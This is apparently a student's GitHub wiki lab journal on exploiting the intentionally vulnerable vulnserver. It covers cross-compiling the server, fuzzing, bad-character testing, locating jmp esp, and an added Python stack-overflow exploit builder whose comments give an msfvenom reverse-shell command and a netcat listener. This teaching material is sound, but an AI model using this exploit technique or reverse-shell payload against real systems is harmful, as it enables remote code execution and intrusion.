7.1 Windows Buffer Overflow - JadenGil/Jaden-Tech-Journal GitHub Wiki

Method 2:

A Windows 10 machine installed, with no network activity yet:

Deliverable 1:

image

On the Kali box we need to build vulnserver for Windows, which requires the MinGW cross-compiler. Install it with sudo apt update followed by sudo apt install -y mingw-w64.

Then clone the source and cross-compile the helper DLL and the server:

```bash
git clone https://github.com/stephenbradshaw/vulnserver
cd vulnserver
# compile the helper library (the code that will hold our jmp esp) to an object file
i686-w64-mingw32-gcc -c essfunc.c
# link it into a DLL at a fixed base with ASLR disabled, so any address found in it stays stable across restarts
i686-w64-mingw32-gcc -shared -o essfunc.dll -Wl,--out-implib=libessfunc.a -Wl,--image-base=0x62500000,--disable-dynamicbase essfunc.o -static-libgcc -static-libstdc++
# build the server itself against Winsock and the import library produced above
i686-w64-mingw32-gcc vulnserver.c -o vulnserver.exe -lws2_32 ./libessfunc.a
```

The following should now be in the vulnserver directory:

image

To move vulnserver.exe and essfunc.dll to the Windows box I started an HTTP server on the Kali box like so:

image

Then I navigated to that address in a web browser on the Windows box and downloaded the files needed:

image

Then, in an administrator PowerShell session, enter the following:

image

Install Immunity Debugger:

https://github.com/kbandla/ImmunityDebugger


Then run vulnserver:

image

Using Nmap on the Kali box we can test the connection between the two machines (vulnserver listens on TCP 9999 by default):

Deliverable 2:

image

Deliverable 3:

image

Using wget on the Kali box we can download mona.py.

Move it into the vulnserver directory so the Windows machine can fetch it from the same HTTP server:

image

Then we move it into Immunity Debugger's PyCommands directory, seen in the screenshot below (mona only loads as the !mona command from there):

image

Deliverable 4:

image

Run fuzzer.py:

image

This was what Immunity Debugger showed after running the fuzzer against vulnserver (the crash, with EIP overwritten by our input):

Deliverable 5:

image

On the Kali box, update the fuzzer file to send the bad-character test string (every byte value 0x01 through 0xff, placed after the EIP overwrite so it can be compared in memory):

image

Running the code will output this on the Kali machine:

image

And on the Windows box this is the output on the debugger:

image

On the Kali box run msf-nasm_shell and, at its prompt, enter jmp esp. It prints the opcode bytes for that instruction (FFE4), which is the byte pattern we search for in essfunc.dll:

image

Deliverable 6:

image

Now we want to restart the debugger (in the debugger select Debug -> Restart) and then select Run, so vulnserver is listening again under the debugger.

Then back on the Kali box we type the following msfvenom command to generate the shellcode:

image

And you should get the following output:

image

Then we make the following edits to fuzzer.py so it sends the final exploit buffer (filler, the jmp esp address, and the shellcode):

image

Then we start a netcat listener on port 4448 to catch the shell:

image
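The steps above (fuzz, send the bad-character string, pack the jmp esp address, prepend filler and append shellcode) are spread over several edits to fuzzer.py whose contents are only in the screenshots. The script below is an added example written for this page, not the journal's own fuzzer.py or anything from the vulnserver project. The target address, the TRUN command prefix, the offset of 2003, the jmp esp address 0x625011AF, the null byte as the only bad character, and the 0xCC placeholder shellcode are all assumptions; replace each with the value you recovered in the debugger.

```python
import socket
import struct

# Everything below is an assumption used for illustration; substitute the
# values from your own build (offset from mona/pattern_offset, jmp esp
# address from "!mona jmp -r esp", bad characters from "!mona compare").
TARGET_IP = "192.168.56.101"   # assumed address of the Windows box
TARGET_PORT = 9999             # vulnserver's default listening port
COMMAND = b"TRUN /.:/"         # assumed vulnerable command prefix
OFFSET = 2003                  # assumed distance from buffer start to saved EIP
JMP_ESP = 0x625011AF           # assumed address of an FF E4 inside essfunc.dll
BAD_CHARS = frozenset({0x00})  # assumed: only the null byte turned out bad

# Real shellcode would come from msfvenom, e.g. (a typical command, not the page's):
#   msfvenom -p windows/shell_reverse_tcp LHOST=<kali ip> LPORT=4448 \
#       EXITFUNC=thread -b "\x00" -f python -v shellcode
# A constructed INT3 placeholder stands in for it so the script runs offline.
SHELLCODE = b"\xcc" * 32


def fuzz_buffers(start=100, step=100, limit=5000):
    """Growing buffers of 'A's, the pattern a fuzzer uses to find the crash size."""
    return [b"A" * size for size in range(start, limit + 1, step)]


def badchar_probe(exclude=frozenset()):
    """Bytes 0x01..0xff minus the ones already proven bad.

    0x00 is omitted from the start because it terminates C strings.  Sent
    after the EIP overwrite, this string lands where ESP points, so it can be
    compared byte-for-byte in the debugger to spot mangled or truncating bytes.
    """
    return bytes(b for b in range(1, 256) if b not in exclude)


def pack_return_address(addr):
    """x86 is little-endian: 0x625011AF must be written as AF 11 50 62."""
    return struct.pack("<I", addr)


def build_badchar_stage(offset, exclude=frozenset()):
    """Filler, a 'BBBB' marker that lands in EIP, then the probe bytes."""
    return b"A" * offset + b"BBBB" + badchar_probe(exclude)


def build_exploit(offset, ret_addr, shellcode, nop_count=16):
    """Filler, jmp esp address, NOP sled, shellcode.

    After the overwritten return address is popped, ESP points just past it,
    so jmp esp lands in the sled and slides into the shellcode.  The sled gives
    msfvenom's decoder stub room to unpack without overwriting itself.
    """
    return (b"A" * offset
            + pack_return_address(ret_addr)
            + b"\x90" * nop_count
            + shellcode)


def find_bad_bytes(payload, offset, bad_chars):
    """Forbidden byte values present from the EIP overwrite onward.

    The return address itself is included in the check: an address containing
    a bad byte would be corrupted before it ever reaches EIP.
    """
    controlled = payload[offset:]
    return sorted(set(controlled) & set(bad_chars))


def send(data, ip=TARGET_IP, port=TARGET_PORT):
    """Deliver one buffer to vulnserver (not called during offline tests)."""
    with socket.create_connection((ip, port), timeout=5) as s:
        s.recv(1024)                 # consume the welcome banner first
        s.sendall(COMMAND + data)


if __name__ == "__main__":
    payload = build_exploit(OFFSET, JMP_ESP, SHELLCODE)
    print(f"payload length {len(payload)}, EIP bytes {payload[OFFSET:OFFSET + 4].hex()}")
    print("bad bytes present:", find_bad_bytes(payload, OFFSET, BAD_CHARS))
    # With vulnserver running under the debugger and "nc -lvnp 4448" waiting:
    # send(payload)
```

Run the bad-character stage first and diff the bytes at ESP against badchar_probe() in the debugger; only once find_bad_bytes() on the final buffer returns an empty list is it worth sending the exploit.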

Deliverable 7:

image